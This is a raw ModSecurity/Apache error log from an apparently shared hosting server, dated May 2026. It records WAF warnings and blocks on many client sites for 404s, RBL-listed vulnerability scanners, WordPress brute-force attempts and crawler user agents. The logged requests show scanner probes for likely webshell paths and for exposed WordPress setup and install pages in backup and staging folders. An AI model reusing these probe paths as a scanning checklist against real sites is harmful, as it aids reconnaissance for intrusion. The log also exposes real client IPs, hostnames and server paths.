[Tue May 26 16:13:17.533775 2026] [security2:error] [pid 782634:tid 782782] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5Rf_P9qBfeb1w76Y7ZQAAABI"]
[Tue May 26 16:13:17.545838 2026] [security2:error] [pid 782634:tid 782811] [client 45.148.10.5:12882] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5Rf_P9qBfeb1w76Y7bQAALxM"]
[Tue May 26 16:13:17.883829 2026] [security2:error] [pid 782634:tid 782839] [client 45.148.10.5:12882] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5Rf_P9qBfeb1w76Y7cwAASwU"]
[Tue May 26 16:13:18.194001 2026] [security2:error] [pid 782634:tid 782795] [client 20.205.111.246:11940] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/w.php"] [unique_id "ahV5Rv_P9qBfeb1w76Y7fQAAAB8"]
[Tue May 26 16:13:18.287821 2026] [security2:error] [pid 782634:tid 782856] [client 45.148.10.5:12882] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5Rv_P9qBfeb1w76Y7fgAAXCY"]
[Tue May 26 16:13:18.788696 2026] [security2:error] [pid 782634:tid 782870] [client 45.148.10.5:12882] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5Rv_P9qBfeb1w76Y7jgAAahQ"]
[Tue May 26 16:13:18.886862 2026] [security2:error] [pid 782634:tid 782819] [client 20.205.111.246:10938] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/x.php"] [unique_id "ahV5Rv_P9qBfeb1w76Y7jwAAADc"]
[Tue May 26 16:13:19.075122 2026] [security2:error] [pid 782634:tid 782797] [client 45.148.10.5:12882] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5R__P9qBfeb1w76Y7lgAAIRw"]
[Tue May 26 16:13:19.402112 2026] [security2:error] [pid 782634:tid 782774] [client 45.148.10.5:12882] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5R__P9qBfeb1w76Y7mwAACik"]
[Tue May 26 16:13:19.441577 2026] [security2:error] [pid 782634:tid 782852] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5R__P9qBfeb1w76Y7lQAAAFg"]
[Tue May 26 16:13:19.554740 2026] [security2:error] [pid 782634:tid 782785] [client 20.205.111.246:10882] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/xx.php"] [unique_id "ahV5R__P9qBfeb1w76Y7pQAAABU"]
[Tue May 26 16:13:19.784955 2026] [security2:error] [pid 782634:tid 782829] [client 45.148.10.5:12882] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5R__P9qBfeb1w76Y7pgAAQRs"]
[Tue May 26 16:13:20.306166 2026] [security2:error] [pid 782634:tid 782826] [client 45.148.10.5:12882] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5SP_P9qBfeb1w76Y7sQAAPho"]
[Tue May 26 16:13:20.504163 2026] [security2:error] [pid 782634:tid 782843] [client 20.205.111.246:1624] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/xmlrpc.php"] [unique_id "ahV5SP_P9qBfeb1w76Y7sAAAAE8"]
[Tue May 26 16:13:20.897199 2026] [security2:error] [pid 782634:tid 782849] [client 45.148.10.5:12882] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5SP_P9qBfeb1w76Y7wQAAVSQ"]
[Tue May 26 16:13:21.004746 2026] [security2:error] [pid 782634:tid 782844] [client 43.173.177.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahV5SP_P9qBfeb1w76Y7wAAAAFA"]
[Tue May 26 16:13:21.194981 2026] [security2:error] [pid 782634:tid 782793] [client 20.205.111.246:8494] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/y.php"] [unique_id "ahV5Sf_P9qBfeb1w76Y7ywAAAB0"]
[Tue May 26 16:13:21.598994 2026] [security2:error] [pid 782634:tid 782797] [client 185.191.171.10:25036] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school/page/2/"] [unique_id "ahV5Sf_P9qBfeb1w76Y71gAAACE"]
[Tue May 26 16:13:21.599133 2026] [security2:error] [pid 782634:tid 782797] [client 185.191.171.10:25036] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school/page/2/"] [unique_id "ahV5Sf_P9qBfeb1w76Y71gAAACE"]
[Tue May 26 16:13:21.672781 2026] [security2:error] [pid 782634:tid 782764] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5Sf_P9qBfeb1w76Y70QAAAAA"]
[Tue May 26 16:13:22.690336 2026] [security2:error] [pid 782634:tid 782798] [client 45.148.10.5:12882] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5Sv_P9qBfeb1w76Y78AAAIiU"]
[Tue May 26 16:13:23.191481 2026] [security2:error] [pid 782634:tid 782795] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5Sv_P9qBfeb1w76Y79gAAAB8"]
[Tue May 26 16:13:23.287471 2026] [security2:error] [pid 782634:tid 782678] [remote 45.148.10.5:12882] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5S__P9qBfeb1w76Y8AgAASCs"]
[Tue May 26 16:13:25.093394 2026] [security2:error] [pid 782634:tid 782792] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5TP_P9qBfeb1w76Y8JAAAABw"]
[Tue May 26 16:13:25.951453 2026] [security2:error] [pid 782634:tid 782808] [client 103.44.52.196:48852] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV5Tf_P9qBfeb1w76Y8QAAAACw"]
[Tue May 26 16:13:25.951687 2026] [security2:error] [pid 782634:tid 782808] [client 103.44.52.196:48852] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV5Tf_P9qBfeb1w76Y8QAAAACw"]
[Tue May 26 16:13:26.516614 2026] [security2:error] [pid 782634:tid 782821] [client 106.219.85.83:4993] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV5Tv_P9qBfeb1w76Y8RwAAADk"]
[Tue May 26 16:13:26.516758 2026] [security2:error] [pid 782634:tid 782821] [client 106.219.85.83:4993] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV5Tv_P9qBfeb1w76Y8RwAAADk"]
[Tue May 26 16:13:27.780900 2026] [security2:error] [pid 782634:tid 782837] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5T__P9qBfeb1w76Y8WgAAAEk"]
[Tue May 26 16:13:29.042286 2026] [security2:error] [pid 782634:tid 782846] [client 81.22.193.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV5T__P9qBfeb1w76Y8YwAAAFI"], referer: https://www.anujtradingco.com/
[Tue May 26 16:13:29.937340 2026] [security2:error] [pid 782634:tid 782841] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5Uf_P9qBfeb1w76Y8hgAAAE0"]
[Tue May 26 16:13:30.678993 2026] [security2:error] [pid 782634:tid 782891] [client 81.22.193.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV5Uv_P9qBfeb1w76Y8pQAAAH8"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1455561&moderation-hash=d8a8db260cabf79fd7e5e9c648a6f0fa
[Tue May 26 16:13:30.794192 2026] [security2:error] [pid 782634:tid 782783] [client 138.219.75.244:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV5Uv_P9qBfeb1w76Y8rgAAABM"], referer: https://www.anujtradingco.com/
[Tue May 26 16:13:31.851692 2026] [security2:error] [pid 782634:tid 782784] [client 138.219.75.244:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV5U__P9qBfeb1w76Y8yAAAABQ"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1471757&moderation-hash=9cfbb804ff1b9d4869a2d8346f8fb92c
[Tue May 26 16:13:31.910353 2026] [security2:error] [pid 782634:tid 782883] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5U__P9qBfeb1w76Y8uAAAAHc"]
[Tue May 26 16:13:33.684411 2026] [security2:error] [pid 782634:tid 782799] [client 185.93.89.10:58080] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "pronumbers.com.au"] [uri "/400.shtml"] [unique_id "ahV5Vf_P9qBfeb1w76Y89AAAACM"]
[Tue May 26 16:13:33.937261 2026] [security2:error] [pid 782634:tid 782888] [client 138.219.75.244:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV5Vf_P9qBfeb1w76Y8_QAAAHw"], referer: https://anujtradingco.com
[Tue May 26 16:13:34.025846 2026] [security2:error] [pid 782634:tid 782790] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5Vf_P9qBfeb1w76Y88AAAABo"]
[Tue May 26 16:13:34.634135 2026] [autoindex:error] [pid 782634:tid 782889] [client 205.210.31.31:61080] AH01276: Cannot serve directory /home2/svijakqj/masonicarkfoundation.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:13:36.116239 2026] [security2:error] [pid 782634:tid 782817] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5V__P9qBfeb1w76Y9KQAAADU"]
[Tue May 26 16:13:36.431745 2026] [security2:error] [pid 782634:tid 782793] [client 103.44.52.196:42130] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV5WP_P9qBfeb1w76Y9PAAAAB0"]
[Tue May 26 16:13:36.431932 2026] [security2:error] [pid 782634:tid 782793] [client 103.44.52.196:42130] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV5WP_P9qBfeb1w76Y9PAAAAB0"]
[Tue May 26 16:13:36.969493 2026] [security2:error] [pid 782634:tid 782784] [client 106.219.85.83:20348] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV5WP_P9qBfeb1w76Y9RAAAABQ"]
[Tue May 26 16:13:36.969664 2026] [security2:error] [pid 782634:tid 782784] [client 106.219.85.83:20348] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV5WP_P9qBfeb1w76Y9RAAAABQ"]
[Tue May 26 16:13:37.463788 2026] [security2:error] [pid 782634:tid 782835] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5Wf_P9qBfeb1w76Y9SgAAAEc"]
[Tue May 26 16:13:40.132204 2026] [security2:error] [pid 782634:tid 782838] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5W__P9qBfeb1w76Y9igAAAEo"]
[Tue May 26 16:13:41.539075 2026] [security2:error] [pid 782634:tid 782760] [remote 125.99.184.138:60214] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.184.99.125.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/wp-login.php"] [unique_id "ahV5Xf_P9qBfeb1w76Y9rwAARH0"]
[Tue May 26 16:13:41.637326 2026] [security2:error] [pid 782634:tid 782801] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5Xf_P9qBfeb1w76Y9rgAAACU"]
[Tue May 26 16:13:42.975097 2026] [security2:error] [pid 782634:tid 782809] [client 74.7.228.25:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "mail.thedebateafrica.org"] [uri "/index.php"] [unique_id "ahV5Xf_P9qBfeb1w76Y9wAAAAC0"]
[Tue May 26 16:13:42.978012 2026] [security2:error] [pid 782634:tid 782856] [client 74.7.228.25:59734] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "mail.thedebateafrica.org"] [uri "/robots.txt"] [unique_id "ahV5Xf_P9qBfeb1w76Y9vgAAXAA"]
[Tue May 26 16:13:43.178397 2026] [security2:error] [pid 782634:tid 782813] [client 54.205.63.235:53013] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-admin/setup-config.php"] [unique_id "ahV5X__P9qBfeb1w76Y94QAAADE"]
[Tue May 26 16:13:43.242692 2026] [security2:error] [pid 782634:tid 782766] [client 54.205.63.235:55111] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wordpress1/wp-admin/setup-config.php"] [unique_id "ahV5X__P9qBfeb1w76Y95gAAAAI"]
[Tue May 26 16:13:43.242819 2026] [security2:error] [pid 782634:tid 782882] [client 54.205.63.235:55109] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/old/wp-admin/setup-config.php"] [unique_id "ahV5X__P9qBfeb1w76Y95QAAAHY"]
[Tue May 26 16:13:43.242901 2026] [security2:error] [pid 782634:tid 782789] [client 54.205.63.235:55108] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wordpress/wp-admin/setup-config.php"] [unique_id "ahV5X__P9qBfeb1w76Y95AAAABk"]
[Tue May 26 16:13:43.243496 2026] [security2:error] [pid 782634:tid 782821] [client 54.205.63.235:55112] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/staging/wp-admin/setup-config.php"] [unique_id "ahV5X__P9qBfeb1w76Y96AAAADk"]
[Tue May 26 16:13:43.243775 2026] [security2:error] [pid 782634:tid 782779] [client 54.205.63.235:55113] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/backup/wp-admin/setup-config.php"] [unique_id "ahV5X__P9qBfeb1w76Y96QAAAA8"]
[Tue May 26 16:13:43.243829 2026] [security2:error] [pid 782634:tid 782823] [client 54.205.63.235:55110] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp/wp-admin/setup-config.php"] [unique_id "ahV5X__P9qBfeb1w76Y95wAAADs"]
[Tue May 26 16:13:43.244186 2026] [security2:error] [pid 782634:tid 782799] [client 54.205.63.235:55115] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wordpress/wp-admin/install.php"] [unique_id "ahV5X__P9qBfeb1w76Y96gAAACM"]
[Tue May 26 16:13:43.244281 2026] [security2:error] [pid 782634:tid 782817] [client 54.205.63.235:55116] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/old/wp-admin/install.php"] [unique_id "ahV5X__P9qBfeb1w76Y97AAAADU"]
[Tue May 26 16:13:43.244410 2026] [security2:error] [pid 782634:tid 782779] [client 54.205.63.235:55117] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/staging/wp-admin/install.php"] [unique_id "ahV5X__P9qBfeb1w76Y97QAAAA8"]
[Tue May 26 16:13:43.245004 2026] [security2:error] [pid 782634:tid 782768] [client 54.205.63.235:55118] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wordpress1/wp-admin/install.php"] [unique_id "ahV5X__P9qBfeb1w76Y97gAAAAQ"]
[Tue May 26 16:13:43.245011 2026] [security2:error] [pid 782634:tid 782778] [client 54.205.63.235:55120] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/backup/wp-admin/install.php"] [unique_id "ahV5X__P9qBfeb1w76Y97wAAAA4"]
[Tue May 26 16:13:43.245114 2026] [security2:error] [pid 782634:tid 782865] [client 54.205.63.235:55119] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp/wp-admin/install.php"] [unique_id "ahV5X__P9qBfeb1w76Y98AAAAGU"]
